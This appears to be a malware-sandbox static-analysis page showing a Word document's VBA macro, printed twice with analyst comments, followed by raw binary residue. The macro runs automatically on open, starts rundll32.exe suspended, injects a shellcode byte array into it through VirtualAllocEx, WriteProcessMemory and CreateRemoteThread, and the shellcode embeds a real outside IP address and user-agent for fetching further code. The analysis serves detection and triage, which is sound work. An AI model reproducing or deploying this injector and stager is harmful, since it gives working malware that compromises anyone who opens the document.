Static | ZeroBOX

Original


                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Image1, 0, 0, MSForms, Image"

                                    

Deobfuscated


                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Image1, 0, 0, MSForms, Image"

                                    

Original


                                        Attribute VB_Name = "NewMacros"
' VBA mirror of the Win32 PROCESS_INFORMATION structure. It is passed as the
' lpProcessInformation argument of the CreateProcessA import ("RunStuff") and
' receives the handles/IDs of the newly created process.
' NOTE(review): handle fields are declared As Long (32-bit) even though the module
' also has a VBA7 branch; on 64-bit Office this layout would not match the native
' structure - confirm which Office bitness the sample was built for.
Private Type PROCESS_INFORMATION
    hProcess As Long        ' process handle; later used as the target of the alloc/write/thread calls
    hThread As Long         ' primary-thread handle; never referenced again in this module
    dwProcessId As Long
    dwThreadId As Long
End Type

' VBA mirror of the Win32 STARTUPINFO structure, passed as lpStartupInfo to the
' CreateProcessA import ("RunStuff"). The macro never assigns any field, so the
' structure is handed to the API in its default zero/empty state (cb is not set).
Private Type STARTUPINFO
    cb As Long
    lpReserved As String
    lpDesktop As String
    lpTitle As String
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Long
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type

' Win32 imports used for cross-process code injection, declared under neutral
' names. The real kernel32 exports remain visible in the Alias strings, which is
' what static scanners and string-based rules can key on:
'   CreateStuff -> CreateRemoteThread
'   AllocStuff  -> VirtualAllocEx
'   WriteStuff  -> WriteProcessMemory
'   RunStuff    -> CreateProcessA
' Two declaration sets are provided: PtrSafe/LongPtr for VBA7 hosts and plain
' Long for older hosts.
' NOTE(review): even in the VBA7 branch hProcess is declared As Long, not LongPtr.
' NOTE(review): the non-VBA7 RunStuff declaration spells the parameter
' "lpCurrentDriectory"; it is only a parameter name and does not affect the call.
#If VBA7 Then
    Private Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As LongPtr
    Private Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
    Private Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As LongPtr, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As LongPtr) As LongPtr
    Private Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
#Else
    Private Declare Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As Long
    Private Declare Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
    Private Declare Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As Long, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As Long) As Long
    Private Declare Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
#End If

' Auto_Open: payload routine of this module (also reached through AutoOpen and
' Workbook_Open below). It starts rundll32.exe suspended, allocates executable
' memory inside that process, copies the byte array into it one byte at a time
' and starts a remote thread at the copied bytes.
'
' Analyst notes (detection / triage):
'   - Process lineage: an Office application creating rundll32.exe with no DLL or
'     export argument on the command line.
'   - The path literals contain "\\"; VBA does not treat backslash as an escape,
'     so the doubled backslashes appear verbatim in the child's command line.
'   - API sequence in the child: VirtualAllocEx with PAGE_EXECUTE_READWRITE,
'     one WriteProcessMemory call per array element (each 1 byte long), then
'     CreateRemoteThread.
'   - No return value is checked and no handle is closed; the suspended primary
'     thread is never resumed (no ResumeThread import exists in this module).
Sub Auto_Open()
    ' Moves the embedded Image1 control to the top and sets its width to 0
    ' (presumably hides the lure image once macros run - confirm in the document).
    Project.ThisDocument.Image1.Top = 0
    Project.ThisDocument.Image1.Width = 0
    Dim myByte As Long, myArray As Variant, offset As Long
    Dim pInfo As PROCESS_INFORMATION
    Dim sInfo As STARTUPINFO
    Dim sNull As String
    Dim sProc As String

#If VBA7 Then
    Dim rwxpage As LongPtr, res As LongPtr
#Else
    Dim rwxpage As Long, res As Long
#End If
    ' Binary blob stored as signed bytes (-128..127; e.g. -4 is 0xFC).
    ' Printable ASCII runs embedded in it decode to the following strings, which
    ' should be treated as network indicators for this sample:
    '   "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)"
    '   "/Cnu6"
    '   "101.35.100[.]211"   (defanged here; stored without brackets)
    ' The fragments "net" and "wini" also appear as pushed immediates, which
    ' suggests the blob loads wininet for HTTP - confirm by disassembly.
    myArray = Array(-4, -24, -119, 0, 0, 0, 96, -119, -27, 49, -46, 100, -117, 82, 48, -117, 82, 12, -117, 82, 20, -117, 114, 40, 15, -73, 74, 38, 49, -1, 49, -64, -84, 60, 97, 124, 2, 44, 32, -63, -49, _
13, 1, -57, -30, -16, 82, 87, -117, 82, 16, -117, 66, 60, 1, -48, -117, 64, 120, -123, -64, 116, 74, 1, -48, 80, -117, 72, 24, -117, 88, 32, 1, -45, -29, 60, 73, -117, 52, -117, 1, _
-42, 49, -1, 49, -64, -84, -63, -49, 13, 1, -57, 56, -32, 117, -12, 3, 125, -8, 59, 125, 36, 117, -30, 88, -117, 88, 36, 1, -45, 102, -117, 12, 75, -117, 88, 28, 1, -45, -117, 4, _
-117, 1, -48, -119, 68, 36, 36, 91, 91, 97, 89, 90, 81, -1, -32, 88, 95, 90, -117, 18, -21, -122, 93, 104, 110, 101, 116, 0, 104, 119, 105, 110, 105, 84, 104, 76, 119, 38, 7, -1, _
-43, 49, -1, 87, 87, 87, 87, 87, 104, 58, 86, 121, -89, -1, -43, -23, -124, 0, 0, 0, 91, 49, -55, 81, 81, 106, 3, 81, 81, 104, 8, -26, 0, 0, 83, 80, 104, 87, -119, -97, _
-58, -1, -43, -21, 112, 91, 49, -46, 82, 104, 0, 2, 64, -124, 82, 82, 82, 83, 82, 80, 104, -21, 85, 46, 59, -1, -43, -119, -58, -125, -61, 80, 49, -1, 87, 87, 106, -1, 83, 86, _
104, 45, 6, 24, 123, -1, -43, -123, -64, 15, -124, -61, 1, 0, 0, 49, -1, -123, -10, 116, 4, -119, -7, -21, 9, 104, -86, -59, -30, 93, -1, -43, -119, -63, 104, 69, 33, 94, 49, -1, _
-43, 49, -1, 87, 106, 7, 81, 86, 80, 104, -73, 87, -32, 11, -1, -43, -65, 0, 47, 0, 0, 57, -57, 116, -73, 49, -1, -23, -111, 1, 0, 0, -23, -55, 1, 0, 0, -24, -117, -1, _
-1, -1, 47, 67, 110, 117, 54, 0, -118, -88, 120, -44, -8, 105, -71, -53, -2, 65, 45, 114, 46, 23, -72, 119, -52, -92, 11, -34, -15, -64, -32, 66, 91, -122, -93, 15, -36, 126, 102, 33, _
87, -85, -47, 106, -91, -5, 65, 41, -116, 91, -114, 75, -72, -55, 41, -102, 80, 93, -116, -109, -68, 25, 111, 47, 107, -27, -76, 27, -85, 121, 39, 105, 76, 110, -112, -22, 106, -123, 53, -24, _
-45, 0, 85, 115, 101, 114, 45, 65, 103, 101, 110, 116, 58, 32, 77, 111, 122, 105, 108, 108, 97, 47, 52, 46, 48, 32, 40, 99, 111, 109, 112, 97, 116, 105, 98, 108, 101, 59, 32, 77, _
83, 73, 69, 32, 55, 46, 48, 59, 32, 87, 105, 110, 100, 111, 119, 115, 32, 78, 84, 32, 53, 46, 49, 59, 32, 84, 114, 105, 100, 101, 110, 116, 47, 52, 46, 48, 59, 32, 46, 78, _
69, 84, 32, 67, 76, 82, 32, 50, 46, 48, 46, 53, 48, 55, 50, 55, 41, 13, 10, 0, 4, -100, -117, -43, -37, -58, -25, -5, 2, 61, 89, 52, -112, 2, 5, 39, 19, -16, 90, 78, _
73, 73, -115, 70, -65, -116, -38, -35, -63, -58, 61, -19, -82, -120, -74, -66, 115, 28, -5, 35, -64, -35, 114, 106, -4, 59, -61, -112, -85, 88, 83, -70, 35, -110, 121, 45, 25, 124, 80, -59, _
-107, 108, 119, -104, -2, 89, -75, 22, -85, -47, -117, -45, -94, 68, 71, -67, -126, -50, -95, -106, 83, 61, 32, -96, 122, 79, -87, -101, 53, -74, -106, -126, 74, -56, -108, -5, 44, 19, -54, -128, _
-15, 30, 80, 86, 33, -83, -46, -20, -82, 17, 78, -97, 73, -69, 4, 86, 36, -67, 92, -110, -89, -93, -113, -20, -69, -36, 39, -126, -124, 120, -18, -25, 97, -90, 40, 65, -73, 73, 16, 72, _
-70, -31, 18, 10, -107, -101, 78, 57, -29, 127, 30, 12, 6, -74, 1, 83, -19, 2, -92, -95, 86, 118, 67, -108, -58, -2, -11, 12, -8, -92, -87, -18, 76, -47, -54, -101, 15, 62, -88, -93, _
115, 38, 8, 43, -75, 62, 97, -54, 105, -112, -2, -117, -72, -41, -55, -37, -59, -114, -63, -100, -97, 55, -10, -12, -5, 0, 104, -16, -75, -94, 86, -1, -43, 106, 64, 104, 0, 16, 0, 0, _
104, 0, 0, 64, 0, 87, 104, 88, -92, 83, -27, -1, -43, -109, -71, 0, 0, 0, 0, 1, -39, 81, 83, -119, -25, 87, 104, 0, 32, 0, 0, 83, 86, 104, 18, -106, -119, -30, -1, -43, _
-123, -64, 116, -58, -117, 7, 1, -61, -123, -64, 117, -27, 88, -61, -24, -87, -3, -1, -1, 49, 48, 49, 46, 51, 53, 46, 49, 48, 48, 46, 50, 49, 49, 0, 73, -106, 2, -46)
    ' ProgramW6432 is normally defined only on 64-bit Windows; in that case the
    ' 32-bit rundll32.exe under SysWOW64 is chosen, otherwise the System32 copy.
    If Len(Environ("ProgramW6432")) > 0 Then
        sProc = Environ("windir") & "\\SysWOW64\\rundll32.exe"
    Else
        sProc = Environ("windir") & "\\System32\\rundll32.exe"
    End If

    ' CreateProcessA: empty application name, sProc as the whole command line,
    ' bInheritHandles = 1, dwCreationFlags = 4 (CREATE_SUSPENDED). pInfo receives
    ' the new process handle. The result in res is not checked.
    res = RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)

    ' VirtualAllocEx in the child: &H1000 = MEM_COMMIT, &H40 = PAGE_EXECUTE_READWRITE.
    rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)
    ' One WriteProcessMemory call per element with Length = 1; myByte is a Long
    ' passed ByRef, so presumably only its low-order byte is copied each time.
    For offset = LBound(myArray) To UBound(myArray)
        myByte = myArray(offset)
        res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&)
    Next offset
    ' CreateRemoteThread with the start address set to the beginning of the
    ' written region; no parameter, default stack size and flags.
    res = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0)
End Sub
' AutoOpen is the macro name Word runs automatically when a document is opened
' (subject to the host's macro security settings); it only forwards to Auto_Open.
Sub AutoOpen()
    Auto_Open
End Sub
' Workbook_Open is the Excel workbook-open event name; it forwards to Auto_Open.
' NOTE(review): this module sits in a Word project, so this entry point is
' presumably present only so the same code can be reused in Excel - confirm.
Sub Workbook_Open()
    Auto_Open
End Sub


                                    

Deobfuscated


                                        Attribute VB_Name = "NewMacros"
' VBA mirror of the Win32 PROCESS_INFORMATION structure. It is passed as the
' lpProcessInformation argument of the CreateProcessA import ("RunStuff") and
' receives the handles/IDs of the newly created process.
' NOTE(review): handle fields are declared As Long (32-bit) even though the module
' also has a VBA7 branch; on 64-bit Office this layout would not match the native
' structure - confirm which Office bitness the sample was built for.
Private Type PROCESS_INFORMATION
    hProcess As Long        ' process handle; later used as the target of the alloc/write/thread calls
    hThread As Long         ' primary-thread handle; never referenced again in this module
    dwProcessId As Long
    dwThreadId As Long
End Type

' VBA mirror of the Win32 STARTUPINFO structure, passed as lpStartupInfo to the
' CreateProcessA import ("RunStuff"). The macro never assigns any field, so the
' structure is handed to the API in its default zero/empty state (cb is not set).
Private Type STARTUPINFO
    cb As Long
    lpReserved As String
    lpDesktop As String
    lpTitle As String
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Long
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type

' Win32 imports used for cross-process code injection, declared under neutral
' names. The real kernel32 exports remain visible in the Alias strings, which is
' what static scanners and string-based rules can key on:
'   CreateStuff -> CreateRemoteThread
'   AllocStuff  -> VirtualAllocEx
'   WriteStuff  -> WriteProcessMemory
'   RunStuff    -> CreateProcessA
' Two declaration sets are provided: PtrSafe/LongPtr for VBA7 hosts and plain
' Long for older hosts.
' NOTE(review): even in the VBA7 branch hProcess is declared As Long, not LongPtr.
' NOTE(review): the non-VBA7 RunStuff declaration spells the parameter
' "lpCurrentDriectory"; it is only a parameter name and does not affect the call.
#If VBA7 Then
    Private Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As LongPtr
    Private Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
    Private Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As LongPtr, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As LongPtr) As LongPtr
    Private Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
#Else
    Private Declare Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As Long
    Private Declare Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
    Private Declare Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As Long, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As Long) As Long
    Private Declare Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
#End If

' Auto_Open: payload routine of this module (also reached through AutoOpen and
' Workbook_Open below). It starts rundll32.exe suspended, allocates executable
' memory inside that process, copies the byte array into it one byte at a time
' and starts a remote thread at the copied bytes.
'
' Analyst notes (detection / triage):
'   - Process lineage: an Office application creating rundll32.exe with no DLL or
'     export argument on the command line.
'   - The path literals contain "\\"; VBA does not treat backslash as an escape,
'     so the doubled backslashes appear verbatim in the child's command line.
'   - API sequence in the child: VirtualAllocEx with PAGE_EXECUTE_READWRITE,
'     one WriteProcessMemory call per array element (each 1 byte long), then
'     CreateRemoteThread.
'   - No return value is checked and no handle is closed; the suspended primary
'     thread is never resumed (no ResumeThread import exists in this module).
Sub Auto_Open()
    ' Moves the embedded Image1 control to the top and sets its width to 0
    ' (presumably hides the lure image once macros run - confirm in the document).
    Project.ThisDocument.Image1.Top = 0
    Project.ThisDocument.Image1.Width = 0
    Dim myByte As Long, myArray As Variant, offset As Long
    Dim pInfo As PROCESS_INFORMATION
    Dim sInfo As STARTUPINFO
    Dim sNull As String
    Dim sProc As String

#If VBA7 Then
    Dim rwxpage As LongPtr, res As LongPtr
#Else
    Dim rwxpage As Long, res As Long
#End If
    ' Binary blob stored as signed bytes (-128..127; e.g. -4 is 0xFC).
    ' Printable ASCII runs embedded in it decode to the following strings, which
    ' should be treated as network indicators for this sample:
    '   "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)"
    '   "/Cnu6"
    '   "101.35.100[.]211"   (defanged here; stored without brackets)
    ' The fragments "net" and "wini" also appear as pushed immediates, which
    ' suggests the blob loads wininet for HTTP - confirm by disassembly.
    myArray = Array(-4, -24, -119, 0, 0, 0, 96, -119, -27, 49, -46, 100, -117, 82, 48, -117, 82, 12, -117, 82, 20, -117, 114, 40, 15, -73, 74, 38, 49, -1, 49, -64, -84, 60, 97, 124, 2, 44, 32, -63, -49, _
13, 1, -57, -30, -16, 82, 87, -117, 82, 16, -117, 66, 60, 1, -48, -117, 64, 120, -123, -64, 116, 74, 1, -48, 80, -117, 72, 24, -117, 88, 32, 1, -45, -29, 60, 73, -117, 52, -117, 1, _
-42, 49, -1, 49, -64, -84, -63, -49, 13, 1, -57, 56, -32, 117, -12, 3, 125, -8, 59, 125, 36, 117, -30, 88, -117, 88, 36, 1, -45, 102, -117, 12, 75, -117, 88, 28, 1, -45, -117, 4, _
-117, 1, -48, -119, 68, 36, 36, 91, 91, 97, 89, 90, 81, -1, -32, 88, 95, 90, -117, 18, -21, -122, 93, 104, 110, 101, 116, 0, 104, 119, 105, 110, 105, 84, 104, 76, 119, 38, 7, -1, _
-43, 49, -1, 87, 87, 87, 87, 87, 104, 58, 86, 121, -89, -1, -43, -23, -124, 0, 0, 0, 91, 49, -55, 81, 81, 106, 3, 81, 81, 104, 8, -26, 0, 0, 83, 80, 104, 87, -119, -97, _
-58, -1, -43, -21, 112, 91, 49, -46, 82, 104, 0, 2, 64, -124, 82, 82, 82, 83, 82, 80, 104, -21, 85, 46, 59, -1, -43, -119, -58, -125, -61, 80, 49, -1, 87, 87, 106, -1, 83, 86, _
104, 45, 6, 24, 123, -1, -43, -123, -64, 15, -124, -61, 1, 0, 0, 49, -1, -123, -10, 116, 4, -119, -7, -21, 9, 104, -86, -59, -30, 93, -1, -43, -119, -63, 104, 69, 33, 94, 49, -1, _
-43, 49, -1, 87, 106, 7, 81, 86, 80, 104, -73, 87, -32, 11, -1, -43, -65, 0, 47, 0, 0, 57, -57, 116, -73, 49, -1, -23, -111, 1, 0, 0, -23, -55, 1, 0, 0, -24, -117, -1, _
-1, -1, 47, 67, 110, 117, 54, 0, -118, -88, 120, -44, -8, 105, -71, -53, -2, 65, 45, 114, 46, 23, -72, 119, -52, -92, 11, -34, -15, -64, -32, 66, 91, -122, -93, 15, -36, 126, 102, 33, _
87, -85, -47, 106, -91, -5, 65, 41, -116, 91, -114, 75, -72, -55, 41, -102, 80, 93, -116, -109, -68, 25, 111, 47, 107, -27, -76, 27, -85, 121, 39, 105, 76, 110, -112, -22, 106, -123, 53, -24, _
-45, 0, 85, 115, 101, 114, 45, 65, 103, 101, 110, 116, 58, 32, 77, 111, 122, 105, 108, 108, 97, 47, 52, 46, 48, 32, 40, 99, 111, 109, 112, 97, 116, 105, 98, 108, 101, 59, 32, 77, _
83, 73, 69, 32, 55, 46, 48, 59, 32, 87, 105, 110, 100, 111, 119, 115, 32, 78, 84, 32, 53, 46, 49, 59, 32, 84, 114, 105, 100, 101, 110, 116, 47, 52, 46, 48, 59, 32, 46, 78, _
69, 84, 32, 67, 76, 82, 32, 50, 46, 48, 46, 53, 48, 55, 50, 55, 41, 13, 10, 0, 4, -100, -117, -43, -37, -58, -25, -5, 2, 61, 89, 52, -112, 2, 5, 39, 19, -16, 90, 78, _
73, 73, -115, 70, -65, -116, -38, -35, -63, -58, 61, -19, -82, -120, -74, -66, 115, 28, -5, 35, -64, -35, 114, 106, -4, 59, -61, -112, -85, 88, 83, -70, 35, -110, 121, 45, 25, 124, 80, -59, _
-107, 108, 119, -104, -2, 89, -75, 22, -85, -47, -117, -45, -94, 68, 71, -67, -126, -50, -95, -106, 83, 61, 32, -96, 122, 79, -87, -101, 53, -74, -106, -126, 74, -56, -108, -5, 44, 19, -54, -128, _
-15, 30, 80, 86, 33, -83, -46, -20, -82, 17, 78, -97, 73, -69, 4, 86, 36, -67, 92, -110, -89, -93, -113, -20, -69, -36, 39, -126, -124, 120, -18, -25, 97, -90, 40, 65, -73, 73, 16, 72, _
-70, -31, 18, 10, -107, -101, 78, 57, -29, 127, 30, 12, 6, -74, 1, 83, -19, 2, -92, -95, 86, 118, 67, -108, -58, -2, -11, 12, -8, -92, -87, -18, 76, -47, -54, -101, 15, 62, -88, -93, _
115, 38, 8, 43, -75, 62, 97, -54, 105, -112, -2, -117, -72, -41, -55, -37, -59, -114, -63, -100, -97, 55, -10, -12, -5, 0, 104, -16, -75, -94, 86, -1, -43, 106, 64, 104, 0, 16, 0, 0, _
104, 0, 0, 64, 0, 87, 104, 88, -92, 83, -27, -1, -43, -109, -71, 0, 0, 0, 0, 1, -39, 81, 83, -119, -25, 87, 104, 0, 32, 0, 0, 83, 86, 104, 18, -106, -119, -30, -1, -43, _
-123, -64, 116, -58, -117, 7, 1, -61, -123, -64, 117, -27, 88, -61, -24, -87, -3, -1, -1, 49, 48, 49, 46, 51, 53, 46, 49, 48, 48, 46, 50, 49, 49, 0, 73, -106, 2, -46)
    ' ProgramW6432 is normally defined only on 64-bit Windows; in that case the
    ' 32-bit rundll32.exe under SysWOW64 is chosen, otherwise the System32 copy.
    If Len(Environ("ProgramW6432")) > 0 Then
        sProc = Environ("windir") & "\\SysWOW64\\rundll32.exe"
    Else
        sProc = Environ("windir") & "\\System32\\rundll32.exe"
    End If

    ' CreateProcessA: empty application name, sProc as the whole command line,
    ' bInheritHandles = 1, dwCreationFlags = 4 (CREATE_SUSPENDED). pInfo receives
    ' the new process handle. The result in res is not checked.
    res = RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)

    ' VirtualAllocEx in the child: &H1000 = MEM_COMMIT, &H40 = PAGE_EXECUTE_READWRITE.
    rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)
    ' One WriteProcessMemory call per element with Length = 1; myByte is a Long
    ' passed ByRef, so presumably only its low-order byte is copied each time.
    For offset = LBound(myArray) To UBound(myArray)
        myByte = myArray(offset)
        res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&)
    Next offset
    ' CreateRemoteThread with the start address set to the beginning of the
    ' written region; no parameter, default stack size and flags.
    res = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0)
End Sub
' AutoOpen is the macro name Word runs automatically when a document is opened
' (subject to the host's macro security settings); it only forwards to Auto_Open.
Sub AutoOpen()
    Auto_Open
End Sub
' Workbook_Open is the Excel workbook-open event name; it forwards to Auto_Open.
' NOTE(review): this module sits in a Word project, so this entry point is
' presumably present only so the same code can be reused in Excel - confirm.
Sub Workbook_Open()
    Auto_Open
End Sub


                                    
bjbjb3b3
sokc____
`:Ua9f<.
`*^"$N
m(p`39
RFBRUd
AY461K_
Dp+]1&G
CECpod(
iE(Nyp
?A'.8ES
MMFUi:
PPtPepL
&Ik3_t<]
R3_ISg"
3T-\:S
$gC&">
Jm)a(?n
ETri~a
Z+{Bg;
\kRBe.I
fv`v`v
97;0;p
hNuv`v
#/"p1c
hNuv`v
I7&mRaG
E0)ZRh
@%!PmN
}t7BWmv<u
mId/lz
fd#HwAm6
Luv`v`
zK(:)Z
9W>;0v`
v,o$P*
"l(?nZ
+B7#`:
F/hJ1`
o`;`L
$rgL(f
KBqi^[4
Iiixb3
hNuv`v
.K+ury
qaVc6t
Ev2Jne
Y`]v,^
Baffa<^.
.zoQ.q
6ZNTGnN
Gr"]XF
yY6i2.
y?W4;0;
"xiZRd
2;0;0;
yta,&i
FL6"D$2
XDri>/
}v`v`v
?ygpF
_!8La
WY$EDt
M$?r"da
ZJE$?v
"O.yt;
XWGlB%+
d>#k;&6
y960JN
|So,Ky
d~N68l
gR:g`U
7fNzf3
lnGp?-W
*=k8d/
x1R{6e
sq1v/>
W%k*V%
l(%?Qu
J !ny;
yuU5=/Q#
UYe%.-
?,cvaf
\_gnW>5
?'%A!z
xkGhLs
an7N-Ju
6+j!9R
)1#B/7E5<s@S7p<5]#]
ibW\j9
404ln0
xdx6L4
Lk`a(xA
H!RMK~
"FC[eC
0$r$l2J
4ti,zh
f`'`!`"
,b|F\A
~Bc#lvqGA6GSK}F
zSTmVl
]nS3xr
A$]>?&.b
t@a]`Y
P@v A0
/(1%w#N
;jdz(V
QP!Ze^
*xaixb
+fe[!P\<A
v!Llr=
S-=&`b
&l#Ljz
a'xcHl
FxU~:>
Tx:R]Lg
Zui"fg*|
'"Pvtw
}P-4>%A8
"HSHg_F
Cx/9F2
:2~_ s
y p p p
t p p p p
nk`tSO
#DruWv
:s1N9Z)
Ol 5e,
I=*T2"
&,ZIu^
)ZiFbf
Hx|yD T%
@)6Wz(
I+0+uu
gx:G |
O~rMPi
zJLHCi
$Ef[ZMY
F%`E+M
Iu+5Z
Z.lZW@0
'1 hd,
N7_t9b
v!L=TERm
=`1Fxd
AFlz(?
0oqr!$qR
"<.$"$9
]}tdw|
XTmARa<
6beh-(
n-B,_C
a UORs
VPUg[2,
/_Bo=
6YIE$7K
vj";uh!\
:{L5,tw
A^P>eD
b)fmUP%%
1r :sv=r8:s
GNmnHw~
wc9Rf%;
_jw"f2
ll;#|h
|O}+?)
0<{>(<|
pbmf'B^
abM:LFyt
75l{l!5
1[gG))
jW7Fi^
D>!8WI
H:gf9w
/:5x&)
h/)9F.Ur
A>1 VA/
j/r".lE
KJEYnb
IVQ*__
Jg{t}Kw
tvgqm!^
U]\q(M
'\E/T
pzf%_i
tm)A_af
9O3v9r&k
CY b00
K"BE_8
.P~P&nR
'leG<
l`&PIY
)HDjeg
<fZz~
r;Uj6+1
q;[:`k6=
N~pBZ
P VIA}
^q3,(+Q
Iw[0?FbR
U6YN><
;pV73^
)t8%f2
!|3]W-3
6?v077
z _&;qtS
Or|1u3
s.IvjW
Z&w2 @
(o(/>i
UJu<J/(
CDG%_j
CL\:%uD
`$_Pq!
?1EDb1
v*tS4#:
2Q 5KZ|
2w\DsHU'
vLuVGsHSq
5ST/^T
.!G6lH
pBhCzC
{RnuW\K=7
,HO)/p
`#j'ic
5\8=LO
,yvjmMP
eGjBZx
*%S5EQ
}Pr2k>
GlR!9r
9):WxdeI
h=e"g#
DR8zXD
U;ezIv
&,l*E*
Y:s pO6
4~6:~&
(^Q+]r(u]
<it[}o
2&$AE$
q81F9U
k+k;@?:
.u/"S&
Qdckt2vCI
U^/e^J
Z\:$%9
eB0{gt
GV)4Fax
[{4E$o
qb8ouGGk~
I9j1J
6X'<)3T)xR;
3sj)*xJ
xg()*s
IU>!-O
U\MU(yq
NH3T^EI)h
*]tF~$*
K9~Bq8
J,)JHnm
32sb`f
?M,WSG
`+GUW\
2#KIQr
)BR"z$
*g^b5W
2@&XFN
Bwc%E9
*DI"D4O\T#
@I8%\D
M> TO7
1f1M>y
kxsz`X
k=DFD5f
av17Xe
Nlo,[0T
eWZBpw
Da.LW4
^^?jD?
0g1Tvo
27J^lp
6krcY<;
cEFFFF
Wxcp|u#8"
pH/n|@4D]
'$j&5E4
e6bYX[
+9nwI@P
Y/"py'
-plbH2[Zl
E7)Eb)
H2@.*O
ii)L[3
b be]S'mx0X
pJM(roe
7@Q[18ix*o
HU*u,B
X^&bUCIn
"%J>%Ly
$@cM']l
o}:fsL$
_]|xLa
+,Il+T6
jj%uuE
6!\z`F
7)m1l<)g
<#us.R
